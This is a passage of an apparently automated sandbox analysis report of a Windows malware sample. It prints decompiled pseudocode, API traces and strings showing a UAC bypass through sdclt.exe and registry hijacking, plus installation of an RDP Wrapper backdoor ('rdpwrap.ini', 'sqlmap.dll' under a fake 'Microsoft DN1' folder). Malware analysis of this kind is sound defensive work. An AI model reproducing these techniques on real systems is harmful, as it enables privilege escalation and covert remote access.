                                      							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
                                      							if(_t48 != 0) {
                                      								break;
                                      							}
                                      							_t50 = _v24 + _t64 * 4;
                                      							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x262520,  &_v16);
                                      							if(_t48 != 0) {
                                      								break;
                                      							}
                                      							__imp__#8( &_v44);
                                      							_t54 = _v16;
                                      							_push(_t87);
                                      							_push( &_v44);
                                      							_push(L"Description");
                                      							_push(_t54);
                                      							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
                                      								L6:
                                      								_t73 = 0x1c;
                                      								if(E00255ADB(_t73) == 0) {
                                      									_t85 = _t87;
                                      								} else {
                                      									_t85 = E0026098D(_t56);
                                      								}
                                      								_t88 = _v36;
                                      								_t57 =  *_t88 & 0x0000ffff;
                                      								if(_t57 == 0) {
                                      									L12:
                                      									 *(_t85 + 8) = _t64;
                                      									E0025239F(_v28 + 4, _t85);
                                      									_t64 = _t64 + 1;
                                      									_t87 = 0;
                                      									continue;
                                      								} else {
                                      									_t76 = _t57;
                                      									do {
                                      										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
                                      										_t60 =  *_t88;
                                      										_t88 =  &(_t88[1]);
                                      										 *((char*)(_t87 +  *_t85)) = _t60;
                                      										_t87 = _t87 + 1;
                                      										_t61 =  *_t88 & 0x0000ffff;
                                      										_t76 = _t61;
                                      									} while (_t61 != 0);
                                      									goto L12;
                                      								}
                                      							}
                                      							_t63 = _v16;
                                      							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
                                      							if(_t48 != 0) {
                                      								break;
                                      							}
                                      							goto L6;
                                      						}
                                      						_t70 = _v8;
                                      						if(_t70 != 0) {
                                      							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
                                      							_v8 = _t87;
                                      						}
                                      						_t71 = _v12;
                                      						if(_t71 != 0) {
                                      							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
                                      							_v12 = _t87;
                                      						}
                                      						__imp__CoUninitialize();
                                      						return _t48;
                                      					}
                                      				}
                                      				return _t43;
                                      			}

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 002606E4
                                      • CoCreateInstance.OLE32(002625A0,00000000,00000001,00264834,?), ref: 00260704
                                      • VariantInit.OLEAUT32(?), ref: 00260760
                                      • CoUninitialize.OLE32 ref: 00260826
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInitInitializeInstanceUninitializeVariant
                                      • String ID: Description$FriendlyName
                                      • API String ID: 4142528535-3192352273
                                      • Opcode ID: f04f12ed62bfbaffa642a0860d573b2ab77a3475f3bc5853f00acf538243a98d
                                      • Instruction ID: d7130611d0fbf3b13006f340101912afd20be3b13ba1398f5556966233b3f73b
                                      • Opcode Fuzzy Hash: f04f12ed62bfbaffa642a0860d573b2ab77a3475f3bc5853f00acf538243a98d
                                      • Instruction Fuzzy Hash: AA415F74A10206EFDB14DFA5C888DAFFBB9EF89700B14849DE442EB250D770E991DB60
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000019B6), ref: 012E19AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
• Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 22f4709e361b8ea66f3918c4621f91acfc924eadc87c2ccd8aa8094e6cff1e56
                                      • Instruction ID: 88ac46b202dd5b3fbf6ef6d711162c25a26c538f2444d2edd661042c87b0b20c
                                      • Opcode Fuzzy Hash: 22f4709e361b8ea66f3918c4621f91acfc924eadc87c2ccd8aa8094e6cff1e56
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Control-flow Graph

                                      C-Code - Quality: 93%
                                      			E002611D0(void* __edx, void* __edi, void* __eflags) {
                                      				char _v584;
                                      				char _v600;
                                      				char _v1112;
                                      				short _v1132;
                                      				intOrPtr _v1212;
                                      				char _v1216;
                                      				char _v1228;
                                      				char _v1232;
                                      				char _v1248;
                                      				intOrPtr _v1264;
                                      				intOrPtr _v1272;
                                      				intOrPtr _v1280;
                                      				intOrPtr _v1296;
                                      				intOrPtr _v1304;
                                      				char _v1308;
                                      				char _v1312;
                                      				int _v1320;
                                      				char _v1328;
                                      				void* _v1332;
                                      				char _v1336;
                                      				char _v1340;
                                      				char _v1344;
                                      				char _v1348;
                                      				intOrPtr _v1360;
                                      				void* __ebx;
                                      				void* _t80;
                                      				void* _t82;
                                      				void* _t83;
                                      				void* _t86;
                                      				char* _t100;
                                      				void* _t104;
                                      				void* _t105;
                                      				void* _t110;
                                      
                                      				_t110 = __eflags;
                                      				_t105 = __edi;
                                      				_t104 = __edx;
                                      				_v1328 = 0xa;
                                      				_v1320 = 0;
                                      				E00255779( &_v1308);
                                      				E0025F43F( &_v1228);
                                      				E00251085(GetTickCount());
                                      				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1332,  &_v1320); // executed
                                      				RegSetValueExA(_v1332, "MaxConnectionsPer1_0Server", 0, 4,  &_v1328, 4); // executed
                                      				RegSetValueExA(_v1332, "MaxConnectionsPerServer", 0, 4,  &_v1328, 4); // executed
                                      				RegCloseKey(_v1332); // executed
                                      				E002555A0( &_v1308, _t104, _t110); // executed
                                      				E0025F2AD( &_v1228, _t104, _t110,  &_v1308); // executed
                                      				_t94 =  &_v584;
                                      				E00254B0F( &_v584, _t104, _t110,  &_v1312,  &_v1232); // executed
                                      				E00251052( &_v1112, 0, 0x208);
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1112, _t86); // executed
                                      				lstrcatW( &_v1132, L"\\Microsoft Vision\\");
                                      				CreateDirectoryW( &_v1132, 0); // executed
                                      				if(_v1280 != 0) {
                                      					_t82 = E0025DB97(); // executed
                                      					if(_t82 != 1) {
                                      						_t83 = E0025D4B8();
                                      						_t113 = _t83 - 0xa;
                                      						if(_t83 != 0xa) {
                                      							E0025F843(0,  &_v584, __eflags);
                                      						} else {
                                      							E0025F8C0(_t104, _t113);
                                      						}
                                      					}
                                      				}
                                      				if(_v1264 != 0) {
                                      					_t80 = E0025DB97();
                                      					_t115 = _t80 - 1;
                                      					if(_t80 == 1) {
                                      						E00260D9D(_t94, _t115);
                                      					}
                                      				}
                                      				_t116 = _v1212;
                                      				if(_v1212 != 0) {
                                      					L11:
                                      					__eflags = _v1272;
                                      					if(__eflags != 0) {
                                      						E0025FCD9();
                                      					}
                                      					E00254A83( &_v600, _t104, __eflags);
                                      					goto L14;
                                      				} else {
                                      					E0025F0C8( &_v1248, _t116, _v1304, _v1296); // executed
                                      					_t117 = _v1312;
                                      					if(_v1312 == 0) {
                                      						goto L11;
                                      					} else {
                                      						_v1336 = 0;
                                      						_t100 =  &_v1344;
                                      						E0025345A(_t100,  &_v1216); // executed
                                      						_push(_t100);
                                      						E0025EB77( &_v1336, _t117,  &_v1348,  &_v1340); // executed
                                      						E00255A2D(_v1360);
                                      						E00255A2D(0);
                                      						L14:
                                      						E00254820( &_v600, _t105, _t117);
                                      						E0025F069( &_v1248);
                                      						E0025579E( &_v1328, _t105);
                                      						return 0;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 002611FD
                                      • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,0000000A,?), ref: 00261227
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00261240
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00261259
                                      • RegCloseKey.KERNEL32(?), ref: 00261263
                                        • Part of subcall function 002555A0: Sleep.KERNEL32(000001F4,?,?,00000000), ref: 002555B6
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002612B9
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 002612CC
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 002612DB
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                        • Part of subcall function 0025D4B8: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D4D0
                                        • Part of subcall function 0025D4B8: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025D4E0
                                        • Part of subcall function 0025F8C0: GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0025F8E2
                                        • Part of subcall function 0025F8C0: IsWow64Process.KERNEL32(00000000), ref: 0025F8E9
                                        • Part of subcall function 0025F8C0: GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0025F920
                                        • Part of subcall function 0025F8C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0025F952
                                        • Part of subcall function 0025F8C0: lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0025F964
                                        • Part of subcall function 0025F8C0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0025F97C
                                        • Part of subcall function 0025F8C0: ShellExecuteExW.SHELL32(?), ref: 0025F9AE
                                        • Part of subcall function 0025F8C0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0025F9B8
                                        • Part of subcall function 0025F8C0: Sleep.KERNEL32(000007D0), ref: 0025F9D0
                                        • Part of subcall function 0025F8C0: RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0025F9E0
                                        • Part of subcall function 0025F8C0: ExitProcess.KERNEL32 ref: 0025F9E7
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 0026121D
                                      • \Microsoft Vision\, xrefs: 002612BF
                                      • MaxConnectionsPerServer, xrefs: 00261250
                                      • MaxConnectionsPer1_0Server, xrefs: 00261237
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentDirectoryExecuteShellSleepTokenValuelstrcat$AddressCountDeleteExitFileFolderHandleInformationLibraryLoadModuleNameOpenPathProcSystemTerminateTickWow64
                                      • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                      • API String ID: 2133878423-2552559493
                                      • Opcode ID: 6e6974344cc9fc1ee2938849e961e774229f6976ca96342c07cab4a49fd80ed4
                                      • Instruction ID: 51eeed4112bf46ba1e597879c6e58ac3fad0ece876a88db29158268ecd99f5d4
                                      • Opcode Fuzzy Hash: 6e6974344cc9fc1ee2938849e961e774229f6976ca96342c07cab4a49fd80ed4
                                      • Instruction Fuzzy Hash: CB413F71468345EBD720EF60DC85DAFB3ECAB54346F00092EBA96814A1DA70996CCF66
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Control-flow Graph

                                      C-Code - Quality: 79%
                                      			E0025C987(void* __ecx, void* __edx) {
                                      				char _v8;
                                      				intOrPtr* _t6;
                                      				void* _t9;
                                      				void* _t10;
                                      				void* _t14;
                                      				void* _t22;
                                      				void* _t31;
                                      				intOrPtr _t32;
                                      				void* _t50;
                                      				intOrPtr _t53;
                                      				void* _t62;
                                      
                                      				_t50 = __edx;
                                      				_push(__ecx);
                                      				InitializeCriticalSection(0x267cd8);
                                      				_t53 = 5;
                                      				asm("xorps xmm0, xmm0");
                                      				 *0x267d24 = _t53;
                                      				 *0x267d1c = _t53;
                                      				_t31 = 0x18;
                                      				asm("movups [0x267cf0], xmm0");
                                      				 *0x267d00 = 0;
                                      				asm("movups [0x267d08], xmm0");
                                      				 *0x267d20 = 0;
                                      				_t6 = E00255ADB(_t31);
                                      				if(_t6 == 0) {
                                      					_t32 = 0;
                                      				} else {
                                      					 *_t6 = _t53;
                                      					_t1 = _t6 + 4; // 0x4
                                      					_t32 = _t1;
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      				}
                                      				 *0x267d18 = _t32;
                                      				 *0x267d30 = 0;
                                      				 *0x267d34 = 0; // executed
                                      				E0025312C(0x267d00, _t50, L"TermService"); // executed
                                      				_t54 = L"%ProgramFiles%";
                                      				E0025312C(0x267d0c, _t50, L"%ProgramFiles%"); // executed
                                      				_t9 = E0025DBF3(0x267d0c); // executed
                                      				_t65 = _t9 - 1;
                                      				if(_t9 != 1) {
                                      					_t51 = 0x267d0c;
                                      					_t10 = E00253001( &_v8, 0x267d0c, __eflags); // executed
                                      					_t62 = 0x267d10;
                                      					E00253264(0x267d10, _t10); // executed
                                      					E00255A2D(_v8);
                                      				} else {
                                      					E0025312C(0x267d0c, _t50, L"%ProgramW6432%");
                                      					_t51 = 0x267d0c;
                                      					_t22 = E00253001( &_v8, 0x267d0c, _t65);
                                      					_t62 = 0x267d10;
                                      					E00253264(0x267d10, _t22);
                                      					E00255A2D(_v8);
                                      					E0025312C(0x267d0c, 0x267d0c, _t54);
                                      				}
                                      				_t55 = L"\\Microsoft DN1";
                                      				E00253297(_t62, _t51, _t65, L"\\Microsoft DN1"); // executed
                                      				_t14 = E00253297(0x267d0c, _t51, _t65, _t55); // executed
                                      				E0025D70F(_t14, _t62);
                                      				E00253264(0x267d14, _t62); // executed
                                      				E00253297(0x267d14, _t51, _t65, L"\\rdpwrap.ini"); // executed
                                      				_t57 = L"\\sqlmap.dll";
                                      				E00253297(_t62, _t51, _t65, L"\\sqlmap.dll"); // executed
                                      				E00253297(0x267d0c, _t51, _t65, _t57); // executed
                                      				return 0x267cd8;
                                      			}
                                      0x0025c987
                                      0x0025c98a
                                      0x0025c993
                                      0x0025c99b
                                      0x0025c99c
                                      0x0025c99f
                                      0x0025c9a7
                                      0x0025c9af
                                      0x0025c9b0
                                      0x0025c9b7
                                      0x0025c9bd
                                      0x0025c9c4
                                      0x0025c9ca
                                      0x0025c9d1
                                      0x0025c9e3
                                      0x0025c9d3
                                      0x0025c9d3
                                      0x0025c9d5
                                      0x0025c9d5
                                      0x0025c9dc
                                      0x0025c9dd
                                      0x0025c9de
                                      0x0025c9df
                                      0x0025c9e0
                                      0x0025c9e0
                                      0x0025c9e5
                                      0x0025c9f5
                                      0x0025c9fb
                                      0x0025ca01
                                      0x0025ca06
                                      0x0025ca13
                                      0x0025ca18
                                      0x0025ca1d
                                      0x0025ca20
                                      0x0025ca57
                                      0x0025ca5c
                                      0x0025ca61
                                      0x0025ca69
                                      0x0025ca71
                                      0x0025ca22
                                      0x0025ca29
                                      0x0025ca2e
                                      0x0025ca33
                                      0x0025ca38
                                      0x0025ca40
                                      0x0025ca48
                                      0x0025ca50
                                      0x0025ca50
                                      0x0025ca76
                                      0x0025ca7e
                                      0x0025ca86
                                      0x0025ca8d
                                      0x0025ca9a
                                      0x0025caa6
                                      0x0025caab
                                      0x0025cab3
                                      0x0025cabb
                                      0x0025cac9

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00267CD8), ref: 0025C993
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                        • Part of subcall function 00253001: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00253034
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                      • String ID: %ProgramFiles%$%ProgramW6432%$TermService$\Microsoft DN1$\rdpwrap.ini$\sqlmap.dll
                                      • API String ID: 2811233055-2974354589
                                      • Opcode ID: dc70ae845964672321850693c9f403d529b70671f54a561c08e52840a72f11ff
                                      • Instruction ID: aa9fe13e93a56eff48141824350584a0c29ee4264090ecb31860dd37fc15b694
                                      • Opcode Fuzzy Hash: dc70ae845964672321850693c9f403d529b70671f54a561c08e52840a72f11ff
                                      • Instruction Fuzzy Hash: 1331E921B34604578704FF29BC5683D66995FC9755720682EFC06D7292DFB08EA98B88
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Control-flow Graph

                                      Control-flow graph (rendered graph not reproduced): basic blocks 12e62f8-12e63be; API calls in graph: LoadLibraryExW, GetLastError, FreeLibrary; internal call: 12e5be1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: 9e64fab638b068566006534c384a280553b1cca18ebbc4f3781a2b25c95f7841
                                      • Instruction ID: 69a6707cb8dc51079201c48ec9604aeb01d28e6b7ea495ef912a257a5d736c67
                                      • Opcode Fuzzy Hash: 9e64fab638b068566006534c384a280553b1cca18ebbc4f3781a2b25c95f7841
                                      • Instruction Fuzzy Hash: 7621EE75E21216ABDF3247299C9DB5F77E89F51F60F940215EF05A7285EA70EC0087D0
                                      Uniqueness

                                      Uniqueness Score: 3.32%

                                      Control-flow Graph

                                      Control-flow graph (rendered graph not reproduced): basic blocks 12f1106-12f117f; API calls in graph: WSAStartup, socket, inet_addr, htons, connect
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 012F1119
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 012F1128
                                      • inet_addr.WS2_32(8.8.8.8), ref: 012F114A
                                      • htons.WS2_32(00000035), ref: 012F1155
                                      • connect.WS2_32(FFFFFFFF,?,00000010), ref: 012F1169
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Startupconnecthtonsinet_addrsocket
                                      • String ID: 8.8.8.8
                                      • API String ID: 4117409672-3817307869
                                      • Opcode ID: 6d1d7e979713a0dbf45f8f96c08fa7b28881de633a2bb20627c4ea302a633209
                                      • Instruction ID: 74b49b8e37f711cba0bc217f0d2847ccc7e62c1b12ccdf4e6ad1e6f46c38a29f
                                      • Opcode Fuzzy Hash: 6d1d7e979713a0dbf45f8f96c08fa7b28881de633a2bb20627c4ea302a633209
                                      • Instruction Fuzzy Hash: E201E574D20219DBDB219FE4D84DBEEB678AB08721F00832AEA31662D5D3B40551DF51
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Control-flow Graph

                                      Control-flow graph (rendered graph not reproduced): basic blocks 12eb50d-12eb6f1; API calls in graph: MultiByteToWideChar (twice), WideCharToMultiByte; internal calls: 12ede58, 12e1c5e, 12f0380, 12e6edf, 12e6656, 12e9a9e
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,012E4206,012E4206,?,?,?,012EB727,00000001,00000001,77E85006), ref: 012EB567
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,012EB727,00000001,00000001,77E85006,?,?,?), ref: 012EB5D0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,77E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 012EB6B0
                                      • __freea.LIBCMT ref: 012EB6BD
                                        • Part of subcall function 012E6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,012E852B,00001000,?,?,?,?,012E3843), ref: 012E6F11
                                      • __freea.LIBCMT ref: 012EB6C6
                                      • __freea.LIBCMT ref: 012EB6EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocHeap
                                      • String ID:
                                      • API String ID: 3147120248-0
                                      • Opcode ID: d5cb2c50db619e2c472be08fee15eed7024fb3530ca8ec083a7672aedc923f8d
                                      • Instruction ID: 3a3813655377e1cec37c0c27a745b38bc1152287db4bbb133b53468fe3ab36a3
                                      • Opcode Fuzzy Hash: d5cb2c50db619e2c472be08fee15eed7024fb3530ca8ec083a7672aedc923f8d
                                      • Instruction Fuzzy Hash: DC518D72620217AFEB259F68DC89EBB3BE9EF54750F954129FA04A7250D770DC108BA0
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Control-flow Graph

                                      Control-flow graph (rendered graph not reproduced): basic blocks 25586a-2558f1; API calls in graph: GetCommandLineA, GetStartupInfoA, GetModuleHandleA, ExitProcess; internal calls: 2558f8, 255925, 2611d0, 25590d
                                      C-Code - Quality: 100%
                                      			E0025586A() {
                                      				struct _STARTUPINFOA _v72;
                                      				intOrPtr _t6;
                                      				int _t11;
                                      				intOrPtr _t15;
                                      				intOrPtr* _t16;
                                      				intOrPtr* _t18;
                                      				intOrPtr _t20;
                                      				void* _t21;
                                      
                                      				_t16 = GetCommandLineA();
                                      				_t6 =  *_t16;
                                      				if(_t6 != 0x22) {
                                      					while(1) {
                                      						__eflags = _t6 - 0x20;
                                      						if(_t6 <= 0x20) {
                                      							break;
                                      						}
                                      						_t16 = _t16 + 1;
                                      						__eflags = _t16;
                                      						_t6 =  *_t16;
                                      					}
                                      					L12:
                                      					if(_t6 != 0) {
                                      						__eflags = _t6 - 0x20;
                                      						if(_t6 > 0x20) {
                                      							goto L13;
                                      						}
                                      						_t16 = _t16 + 1;
                                      						__eflags = _t16;
                                      						L11:
                                      						_t6 =  *_t16;
                                      						goto L12;
                                      					}
                                      					L13:
                                      					_t2 =  &(_v72.dwFlags);
                                      					_v72.dwFlags = _v72.dwFlags & 0x00000000;
                                      					GetStartupInfoA( &_v72);
                                      					E002558F8();
                                      					E00255925(0x266000, 0x26602c);
                                      					GetModuleHandleA(0);
                                      					_t11 = E002611D0(0x26602c, _t21,  *_t2, 0x266000, 0x266000); // executed
                                      					E0025590D();
                                      					ExitProcess(_t11);
